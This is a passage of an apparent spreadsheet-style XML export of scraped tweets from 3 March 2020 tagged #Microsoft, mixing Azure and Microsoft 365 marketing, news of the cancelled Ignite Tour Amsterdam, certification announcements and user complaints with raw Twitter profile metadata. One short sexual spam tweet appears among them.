    <t>{'id': 1052004457, 'id_str': '1052004457', 'name': 'Bilsmore Joarth', 'screen_name': 'BilsmoreJoarth', 'location': 'Lagos, Nigeria', 'description': 'Bilsmore Joarth is an IT solutions company, engaging and empowering small business in IT solutions strategies.', 'url': 'http://t.co/TPQ5S1PEoA', 'entities': {'url': {'urls': [{'url': 'http://t.co/TPQ5S1PEoA', 'expanded_url': 'http://www.bilsmore.com', 'display_url': 'bilsmore.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 27, 'friends_count': 6, 'listed_count': 0, 'created_at': 'Tue Jan 01 06:46:48 +0000 2013', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 161,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'http://pbs.twimg.com/profile_images/378800000775263427/faf5e16d63488f84edbcd817907e9f7b_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000775263427/faf5e16d63488f84edbcd817907e9f7b_normal.png',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</si>
  <si>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07:07:55 +0000 2020</t>
  </si>
  <si>
    <t>definitely got my heart rate going. #halo #halospotlight #343industries #xbox #microsoft https://t.co/norGWI7cKe</t>
  </si>
  <si>
    <t>Tue Mar 03 07:07:52 +0000 2020</t>
  </si>
  <si>
    <t>From enhanced services to optimized defense and intelligence operations, read how #Microsoft for Government is empowering public institutions worldwide. https://t.co/VVcj6blUHY</t>
  </si>
  <si>
    <t>{'id': 69565597, 'id_str': '69565597', 'name': 'Ibeto Obi', 'screen_name': 'IbetoObi', 'location': 'Lagos, Nigeria', 'description': 'CEO  EPINEC | Microsoft Cloudpreneur | Emerging Business Leader', 'url': 'https://t.co/yquTHM8JnZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/yquTHM8JnZ', 'expanded_url': 'http://www.epinecng.com', 'display_url': 'epinecng.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 226, 'friends_count': 107, 'listed_count': 6, 'created_at': 'Fri Aug 28 11:30:21 +0000 2009', 'favourites_count': 150, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1140,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'http://pbs.twimg.com/profile_images/599627712408358912/Wb7G6v8q_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/599627712408358912/Wb7G6v8q_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/69565597/1431798474',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</si>
  <si>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Tue Mar 03 07:07:21 +0000 2020</t>
  </si>
  <si>
    <t>How can you help students tackle the complex challenges of tomorrow? See how educators are transforming learning through student-centered approaches. #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/iLg4TcnHLZ</t>
  </si>
  <si>
    <t>Tue Mar 03 07:06:42 +0000 2020</t>
  </si>
  <si>
    <t>62% of SMBs don't have an active cybersecurity strategy in place. Want to make sure that your data is secure, no matter what apps or devices you and your employees are using? Check out the latest security solutions from #Microsoft 365 Business. https://t.co/c1rxi9lKGC</t>
  </si>
  <si>
    <t>Tue Mar 03 07:04:13 +0000 2020</t>
  </si>
  <si>
    <t>When the time came for the University of Arizona to consolidate their multiple Active Directory domains and modernize their internal network, CatNet, they trusted #Microsoft for a smooth transition and a focus on security. https://t.co/NeNMoChJ4A https://t.co/UlCXzkOGEi</t>
  </si>
  <si>
    <t>Tue Mar 03 07:02:35 +0000 2020</t>
  </si>
  <si>
    <t>Read how various #Microsoft tools enable one educator to help students around the world to develop future-ready skills. #MicrosoftForms https://t.co/hHSccUNC0j</t>
  </si>
  <si>
    <t>{'id': 347691707, 'id_str': '347691707', 'name': 'Tom Freer', 'screen_name': 'tommofreer', 'location': 'Brisbane', 'description': 'Business Owner &amp; Technology Expert. solving business problems with technology and the cloud. fan of the #wallabies and the #qldreds.', 'url': 'https://t.co/4lPZ9TwXah', 'entities': {'url': {'urls': [{'url': 'https://t.co/4lPZ9TwXah', 'expanded_url': 'http://www.wyntec.net.au', 'display_url': 'wyntec.net.au', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 166, 'friends_count': 172, 'listed_count': 23, 'created_at': 'Wed Aug 03 06:01:26 +0000 2011', 'favourites_count': 103, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1405,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'http://pbs.twimg.com/profile_images/1213007486640246786/y1TNmETY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1213007486640246786/y1TNmETY_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/347691707/1578038498',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</si>
  <si>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07:01:26 +0000 2020</t>
  </si>
  <si>
    <t>With #Microsoft #Azure and Tech Data, your company can deliver reliable, excellent service across the whole customer experience -- just like @Lay_Bare! https://t.co/Pj7dVcHrXY</t>
  </si>
  <si>
    <t>Tue Mar 03 07:01:11 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve">'As a result, Microsoft is cancelling the Microsoft Ignite The Tour Amsterdam conference, originally scheduled to take place at RAI Amsterdam on March 11-12, 2020. ' #coronavirus #microsoft </t>
  </si>
  <si>
    <t>{'id': 367008599, 'id_str': '367008599', 'name': 'Kevin van Dort', 'screen_name': 'kevinjvdort', 'location': 'Haarlem', 'description': 'Prefer things like developing .net web apps, mongodb, surfing, healthy food and working at Developers Insight', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 59, 'friends_count': 122, 'listed_count': 13, 'created_at': 'Sat Sep 03 06:32:08 +0000 2011', 'favourites_count': 210, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 850, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '248AC5', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme6/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme6/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/878508338895622145/eBQry5TD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/878508338895622145/eBQry5TD_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/367008599/1579461342', 'profile_link_color': 'F0592C',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</si>
  <si>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07:00:58 +0000 2020</t>
  </si>
  <si>
    <t>Why AWS Is The Platform For Your Microsoft Workloads????
If you are a Microsofty, you are now aghast. In a state of absolute shock? You read with utter disbelief...... https://t.co/zj6uN4tVdr 
#microsoft #windows #office #technology #nintendo #pc #software #computer #aws #cloud https://t.co/hVO6AWKkUG</t>
  </si>
  <si>
    <t>{'id': 1219234783105994753, 'id_str': '1219234783105994753', 'name': 'Industry Tech Outlook - ITO', 'screen_name': 'ITOMagazine', 'location': '', 'description': 'Industry Tech Outlook is bringing forth a medium through which the C-level executives of organizations can make their decisions better on adopting the technolog', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 0, 'listed_count': 0, 'created_at': 'Mon Jan 20 12:26:57 +0000 2020', 'favourites_count': 0,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'http://pbs.twimg.com/profile_images/1224282792617398272/T4whMPmW_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224282792617398272/T4whMPmW_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1219234783105994753/1580726739',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</si>
  <si>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07:00:35 +0000 2020</t>
  </si>
  <si>
    <t>Put today's data explosion to work for your business with #Microsoft #PowerBI and #Azure. Place data at your entire organization's fingertips, enabling anyone to transform business data into actionable insights. Subscribe now. Get in touch with #Azuro https://t.co/UgXk6Wtt1v</t>
  </si>
  <si>
    <t>Tue Mar 03 07:00:17 +0000 2020</t>
  </si>
  <si>
    <t>How to Integrate #Microsoft #Dynamics #AX with #CRM?: Microsoft Dynamics AX is... https://t.co/SDy7CEgCdQ @TechBullion</t>
  </si>
  <si>
    <t>{'id': 1264017896, 'id_str': '1264017896', 'name': 'Network Africa', 'screen_name': 'NetworkAfrica', 'location': 'Africa', 'description': 'Africa Online News Media | News And Articles on Latest Technology Innovations in #Africa. #tech #fintech #Edtech #Blockchain #Proptech #innovation #news', 'url': 'https://t.co/S8OwxMDm5Y', 'entities': {'url': {'urls': [{'url': 'https://t.co/S8OwxMDm5Y', 'expanded_url': 'http://www.NetworkAfrica.com', 'display_url': 'NetworkAfrica.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2944, 'friends_count': 1427, 'listed_count': 48, 'created_at': 'Wed Mar 13 09:29:26 +0000 2013', 'favourites_count': 119, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 19530,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'http://pbs.twimg.com/profile_images/896888439446155264/SULq2LyI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/896888439446155264/SULq2LyI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1264017896/1502669721', 'profile_link_color': 'FA743E',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</si>
  <si>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Tue Mar 03 07:00:13 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is retiring #MCSA, #MCSD, #MCSE certifications with continued investment to #Cloud role-based certifications. Recommended role-based certifications are #Azure, Data &amp;amp; #AI and Microsoft 365. 
Read the full announcement on MS Learning Blog:
https://t.co/OGtQigRzqt https://t.co/EyIj7zSDjj</t>
  </si>
  <si>
    <t>{'id': 388149540, 'id_str': '388149540', 'name': 'BilginÃ§ IT Academy', 'screen_name': 'BilgincITAcadem', 'location': 'Maslak, Istanbul', 'description': 'Pioneer for 25 Years at Corporate IT Trainings\n\n#RedHat, #AmazonWebServices, #CyberSecurity, #Python, #SAP, #SCADEMY, #Scrum, #VMware, #BCS', 'url': 'https://t.co/15iZTo5fY2', 'entities': {'url': {'urls': [{'url': 'https://t.co/15iZTo5fY2', 'expanded_url': 'https://bilginc.com/', 'display_url': 'bilginc.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1041, 'friends_count': 140, 'listed_count': 23, 'created_at': 'Mon Oct 10 08:30:06 +0000 2011', 'favourites_count': 164, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1581,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'http://pbs.twimg.com/profile_images/1205468623575420930/MlTSMgAa_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1205468623575420930/MlTSMgAa_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/388149540/1572620494',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</si>
  <si>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Tue Mar 03 07:00:12 +0000 2020</t>
  </si>
  <si>
    <t>How to Integrate #Microsoft #Dynamics #AX with #CRM? https://t.co/s6VxxRxbBH @TechBullion #software #technology</t>
  </si>
  <si>
    <t>{'id': 791394111945371648, 'id_str': '791394111945371648', 'name': 'SizzlingSuperstars', 'screen_name': 'SizzlingSStars', 'location': 'London, UK', 'description': 'SizzlingSuperstars is an Influencer #News Website focusing on #Celebrities, #Directors, Tech #Innovators and Industry Leaders', 'url': 'https://t.co/lhm9JF94F8', 'entities': {'url': {'urls': [{'url': 'https://t.co/lhm9JF94F8', 'expanded_url': 'http://sizzlingsuperstars.com', 'display_url': 'sizzlingsuperstars.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 49771, 'friends_count': 21714, 'listed_count': 62, 'created_at': 'Wed Oct 26 21:40:34 +0000 2016', 'favourites_count': 36, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1297,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'http://pbs.twimg.com/profile_images/1132075622124130306/_8QQVQOn_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1132075622124130306/_8QQVQOn_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/791394111945371648/1558775199',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</si>
  <si>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06:57:14 +0000 2020</t>
  </si>
  <si>
    <t>How the Data Box Family Can Help with Migrations https://t.co/WVjrCELIry #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 06:54:36 +0000 2020</t>
  </si>
  <si>
    <t>Also, I just wish tutors will give students a heads up on the fact that they're teaching from a ready made portal and what needs to be set up before beginning the classes. 
#igbotechie #Azure #Microsoft #Az103</t>
  </si>
  <si>
    <t>{'id': 3343431473, 'id_str': '3343431473', 'name': 'Franklyn', 'screen_name': 'frankzuchy', 'location': 'Decatur, GA', 'description': "Earthling #drummer #curious #tech #trap enthusiast... I don't believe everything you think I do. #Christian #Igbo #rehl #linux #aws #azure #photographer", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 661, 'friends_count': 1049, 'listed_count': 2, 'created_at': 'Wed Jun 24 00:57:10 +0000 2015', 'favourites_count': 6142, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3056,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'http://pbs.twimg.com/profile_images/1227831156294520833/jjNX4APC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1227831156294520833/jjNX4APC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3343431473/1479223926',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</si>
  <si>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06:52:06 +0000 2020</t>
  </si>
  <si>
    <t>Would you like to fuck such an ass? #Burlington   #morning #microsoft https://t.co/FuHS6Tq0g7</t>
  </si>
  <si>
    <t>{'id': 1234650683531579393, 'id_str': '1234650683531579393', 'name': 'Dawn Egland', 'screen_name': 'keyreischoolul', 'location': 'Ann Arbor, USA', 'description': 'Sometimes the heart sees what is invisible to the eye.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 25, 'listed_count': 0, 'created_at': 'Tue Mar 03 01:24:02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'http://pbs.twimg.com/profile_images/1234672935840780289/1JtTEB9q_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234672935840780289/1JtTEB9q_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234650683531579393/1583203982',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</si>
  <si>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06:51:54 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft is canceling the Microsoft Ignite The Tour Amsterdam conference, originally scheduled to take place at RAI Amsterdam on March 11-12, 2020. #Microsoft #Azure #Ignite2020 #Tour</t>
  </si>
  <si>
    <t>{'id': 273456696, 'id_str': '273456696', 'name': 'Daniel Etten', 'screen_name': 'DanielEtten', 'location': 'Netherlands', 'description': '#MCT | Premier Field Engineer @MicrosoftNL | Volunteer website/social @WVCM_NL | #Azure | #AzureStack | #Microsoft365 | #Security minded | Tweets are my own', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 371, 'friends_count': 807, 'listed_count': 26, 'created_at': 'Mon Mar 28 14:42:35 +0000 2011', 'favourites_count': 3847, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2680,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'http://pbs.twimg.com/profile_images/1133290573065052160/oLQXpG8b_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1133290573065052160/oLQXpG8b_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/273456696/1479463453',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</si>
  <si>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06:50:39 +0000 2020</t>
  </si>
  <si>
    <t>MS Azure and the Unibright framework tooling. Wouldn't that be a perfect integration? Just fantasize a little.
#Unibright #Microsoft #Azure $UBT</t>
  </si>
  <si>
    <t>Tue Mar 03 06:48:14 +0000 2020</t>
  </si>
  <si>
    <t>With #Microsoft #Azure, SitePro harnesses the power of data to drive digital transformation for its oil and gas company customers. WaferWire can help your Business gain the competitive edge with Azure, Contact us to learn more.
https://t.co/2Fd5lzZgSS</t>
  </si>
  <si>
    <t>{'id': 243707428, 'id_str': '243707428', 'name': 'WaferWire Cloud Tech', 'screen_name': 'waferwire', 'location': 'Bellevue, WA', 'description': 'We empower businesses to achieve â€˜Digital Transformationâ€™ with competitive technology solutions and services.', 'url': 'http://t.co/RxeoJYvoX0', 'entities': {'url': {'urls': [{'url': 'http://t.co/RxeoJYvoX0', 'expanded_url': 'http://www.waferwire.com', 'display_url': 'waferwire.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 19, 'friends_count': 102, 'listed_count': 8, 'created_at': 'Thu Jan 27 16:54:00 +0000 2011', 'favourites_count': 24, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1209736328222429186/Y90Hixfe_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1209736328222429186/Y90Hixfe_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/243707428/1576487366',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</si>
  <si>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06:47:20 +0000 2020</t>
  </si>
  <si>
    <t>Temporary Article Teaches You The Ins and Outs of Laptop And What You Ought to Do Immediately
https://t.co/Obw1bKVAoO
#hp #deskjet #Ink #benefit #microsoft #laptop</t>
  </si>
  <si>
    <t>Tue Mar 03 06:46:25 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft officially announces Universal Print, a cloud-based print server solution https://t.co/v6ZoTQU0rC #microsoft #feedly</t>
  </si>
  <si>
    <t>Tue Mar 03 06:44:21 +0000 2020</t>
  </si>
  <si>
    <t>Apples iPhone and AirPods may be being manufactured by Chinese slave labour https://t.co/k9IHfbVVnn #microsoft #feedly</t>
  </si>
  <si>
    <t>Tue Mar 03 06:44:19 +0000 2020</t>
  </si>
  <si>
    <t>#Google, #Microsoft cancel tech summits in #US
https://t.co/HOp8J9kAgY https://t.co/jdjPlKYOyo</t>
  </si>
  <si>
    <t>{'id': 224961966, 'id_str': '224961966', 'name': 'YesPunjab.com (For Punjabi follow @BawaHs)', 'screen_name': 'yespunjab', 'location': 'Punjab', 'description': 'https://t.co/L8t5kU2S6h #News #Entertainment #Website with focus on #Punjab #NRIs #India by #HSBawa @bawahs #Journalist. https://t.co/SkG9zabiMw', 'url': 'https://t.co/r2Z3lPzyuG', 'entities': {'url': {'urls': [{'url': 'https://t.co/r2Z3lPzyuG', 'expanded_url': 'http://yespunjab.com', 'display_url': 'yespunjab.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/L8t5kU2S6h', 'expanded_url': 'http://YesPunjab.com', 'display_url': 'YesPunjab.com', 'indices': [0, 23]}, {'url': 'https://t.co/SkG9zabiMw', 'expanded_url': 'https://www.facebook.com/YesPunjab', 'display_url': 'facebook.com/YesPunjab', 'indices': [121, 144]}]}}, 'protected': False, 'followers_count': 112865, 'friends_count': 152612, 'listed_count': 912, 'created_at': 'Fri Dec 10 09:11:16 +0000 2010', 'favourites_count': 41, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 269125, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F5C4', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme10/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme10/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1184016061244424192/rWqNCbts_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1184016061244424192/rWqNCbts_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/224961966/1476203275', 'profile_link_color': 'ED1111', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '7AC3EE', 'profile_text_color': 'FF0000', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 06:42:50 +0000 2020</t>
  </si>
  <si>
    <t>History: Examination of early Windows 8 build shows origins of Metro https://t.co/TH6zbVezsp #microsoft #feedly</t>
  </si>
  <si>
    <t>Tue Mar 03 06:42:20 +0000 2020</t>
  </si>
  <si>
    <t>Why hasn't AI changed the world yet? #digitaltrasformation #ai #microsoft https://t.co/eiyia2tx9h</t>
  </si>
  <si>
    <t>Tue Mar 03 06:42:15 +0000 2020</t>
  </si>
  <si>
    <t>ANOTHER great news for #POUGworkshop attendees! @Azure Day from #Microsoft just for you guys:) Interested? Book your tickets now, we've only have 7 left! https://t.co/J1JrGGcfpD  https://t.co/AEVeS8U4Mx</t>
  </si>
  <si>
    <t>{'id': 704346047150202880, 'id_str': '704346047150202880', 'name': 'ORA-600', 'screen_name': 'POUG_ORG', 'location': '', 'description': 'Pint with Oracle User Group from Poland ðŸ‡µðŸ‡± ðŸ»', 'url': 'https://t.co/8bpGAIUNuO', 'entities': {'url': {'urls': [{'url': 'https://t.co/8bpGAIUNuO', 'expanded_url': 'http://www.poug.org', 'display_url': 'poug.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1128, 'friends_count': 73, 'listed_count': 18, 'created_at': 'Mon Feb 29 16:42:38 +0000 2016', 'favourites_count': 1509, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1723,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'http://pbs.twimg.com/profile_images/704346982526132224/ceO07MEg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/704346982526132224/ceO07MEg_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/704346047150202880/1456764493',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</si>
  <si>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06:40:59 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft edge and chrome and store and feedback and connection and wifi and server and service so much heavy and bad and issues</t>
  </si>
  <si>
    <t>Tue Mar 03 06:39:32 +0000 2020</t>
  </si>
  <si>
    <t>Device prelude. Yes, support most of them. PC-powered VR, Standalone VR, smartphones, tablets, you name them!
#3DOrganon #HTC #VIVE #Oculus #Microsoft https://t.co/xsJC1Mda4K</t>
  </si>
  <si>
    <t>{'id': 2373887551, 'id_str': '2373887551', 'name': '3D Organon - Anatomy', 'screen_name': '3Dorganon', 'location': 'Australia', 'description': '3D Organon is a unique multi-awarded feature-rich multi-user and cross-platform enabled medical anatomy educational and training app.', 'url': 'https://t.co/Hvb4FU1k17', 'entities': {'url': {'urls': [{'url': 'https://t.co/Hvb4FU1k17', 'expanded_url': 'https://www.3Dorganon.com', 'display_url': '3Dorganon.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 229, 'friends_count': 313, 'listed_count': 8, 'created_at': 'Wed Mar 05 14:49:34 +0000 2014', 'favourites_count': 300, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1220149108112945152/m2LGj2G4_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1220149108112945152/m2LGj2G4_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2373887551/1569381234',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</si>
  <si>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06:37:41 +0000 2020</t>
  </si>
  <si>
    <t>Oh no... #Microsoft #ignite in Amsterdam is cancelled due to the #CoronaOutbreak. Although I do understand, I was really looking forward to meet some people... And now I can't.... https://t.co/JFIqb28zTR</t>
  </si>
  <si>
    <t>Tue Mar 03 06:37:05 +0000 2020</t>
  </si>
  <si>
    <t>Well it looks to me official, the #covid19 (Coronavirus) has started or maybe already has,  affected mine and the Dutch IT world. The #Microsoft #IgniteTour2020 in #Amsterdam has been cancelled. Thinking on the wellbeing of all the people who were attendi...https://t.co/GieVbxFFIx</t>
  </si>
  <si>
    <t>{'id': 925752364035919872, 'id_str': '925752364035919872', 'name': 'Free your Data', 'screen_name': 'FreeYourDataCon', 'location': 'Nieuwegein, Nederland', 'description': '', 'url': 'https://t.co/JJn4h6RUsF', 'entities': {'url': {'urls': [{'url': 'https://t.co/JJn4h6RUsF', 'expanded_url': 'https://www.freeyourdata.nl', 'display_url': 'freeyourdata.nl', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 28, 'friends_count': 197, 'listed_count': 0, 'created_at': 'Wed Nov 01 15:52:18 +0000 2017', 'favourites_count': 206, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 220, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/925753142813380609/yx0s9zaS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/925753142813380609/yx0s9zaS_normal.jpg',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</si>
  <si>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06:34:00 +0000 2020</t>
  </si>
  <si>
    <t>With #Microsoft #Office365 #AdvancedThreatProtection, OPTANE SYSTEMS offers an email filtering service that delivers stronger protection against specific types of advanced threats. https://t.co/lCrpKrFbeZ</t>
  </si>
  <si>
    <t>Tue Mar 03 06:33:43 +0000 2020</t>
  </si>
  <si>
    <t>Diversity is being invited to the party. Inclusion is being asked to dance. Cynt Marshall, CEO of the Dallas Mavericks basketball team showed us all how to dance together. What an incredible moment at the 2020 BAM Conference! #microsoft #bamleaders  #microsoftlife https://t.co/5NHExvTyIb</t>
  </si>
  <si>
    <t>{'id': 2300527483, 'id_str': '2300527483', 'name': 'LASHurst', 'screen_name': 'lashgotgame', 'location': 'Seattle', 'description': 'Employee Giving PM @Microsoft.A daydreamer w/ a master plan. Volunteer, Community Engagement &amp; Sports GURU! #CSR #socialgood', 'url': 'https://t.co/YHPSOtLm8M', 'entities': {'url': {'urls': [{'url': 'https://t.co/YHPSOtLm8M', 'expanded_url': 'http://www.microsoft.com/philanthropies', 'display_url': 'microsoft.com/philanthropies', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 466, 'friends_count': 659, 'listed_count': 7, 'created_at': 'Mon Jan 20 00:34:57 +0000 2014', 'favourites_count': 2998, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 916,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'http://pbs.twimg.com/profile_images/841138711903453184/8BGamf-z_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/841138711903453184/8BGamf-z_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2300527483/1489379505',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</si>
  <si>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06:32:09 +0000 2020</t>
  </si>
  <si>
    <t>With #Microsoft #Azure and , your company can deliver reliable, excellent service across the whole customer experience -- just like @Lay_Bare! https://t.co/Y8gLbE3LN7</t>
  </si>
  <si>
    <t>Tue Mar 03 06:30:47 +0000 2020</t>
  </si>
  <si>
    <t>Read how various #Microsoft tools enable one educator to help students around the world to develop future-ready skills. #MicrosoftForms https://t.co/IahBAGUGD3</t>
  </si>
  <si>
    <t>{'id': 828559493529161730, 'id_str': '828559493529161730', 'name': 'Evertrain Systems', 'screen_name': 'Evertrain_Sys', 'location': 'Adelaide, South Australia', 'description': 'Helping organisations effectively use information technology to increase productivity, educate staff and volunteers and empower individuals get organised.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 29, 'friends_count': 199, 'listed_count': 1, 'created_at': 'Mon Feb 06 11:02:31 +0000 2017', 'favourites_count': 8, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 190, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/951023494946439168/xxEk6SCy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/951023494946439168/xxEk6SCy_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/828559493529161730/1560986942',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</si>
  <si>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06:30:20 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft google and youtube and playback and audio issues and bad so much and feedback slow down and bad edge and bad chrome and heavy and bad performance and bad server and service and bad browsing so much and bad response and bad ad</t>
  </si>
  <si>
    <t>Tue Mar 03 06:28:35 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft is canceling the Microsoft Ignite The Tour Amsterdam conference, originally scheduled to take place at RAI Amsterdam on March 11-12, 2020. #Microsoft #Azure #Ignite2020 #Tour @CTransformers</t>
  </si>
  <si>
    <t>{'id': 51985208, 'id_str': '51985208', 'name': 'Johnny de Jong', 'screen_name': 'Johnny_de_Jong', 'location': 'Swifterbant', 'description': 'Azure Engineer @CTransformers #Azure, #AzureStack also likes #F1, fitness and running.', 'url': 'https://t.co/c2drp4ctMh', 'entities': {'url': {'urls': [{'url': 'https://t.co/c2drp4ctMh', 'expanded_url': 'https://www.linkedin.com/in/johnnydejong', 'display_url': 'linkedin.com/in/johnnydejong', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 207, 'friends_count': 419, 'listed_count': 14, 'created_at': 'Mon Jun 29 06:45:26 +0000 2009', 'favourites_count': 3423, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1533,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'http://pbs.twimg.com/profile_images/1117494092454297600/09qAuqbO_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1117494092454297600/09qAuqbO_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/51985208/1555266426', 'profile_link_color': '010A0D',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</si>
  <si>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Tue Mar 03 06:27:00 +0000 2020</t>
  </si>
  <si>
    <t>Surfs up!!  https://t.co/zbXGirFNiN #infosec #EthicalHacking #ITSecurity #ITSEC #CyberSecurity #hacking #ransonware #PatchTuesday #windows #Microsoft #android #StaySafeOnline #Taiyyib #ransonware #malware #SecurityIntelligence</t>
  </si>
  <si>
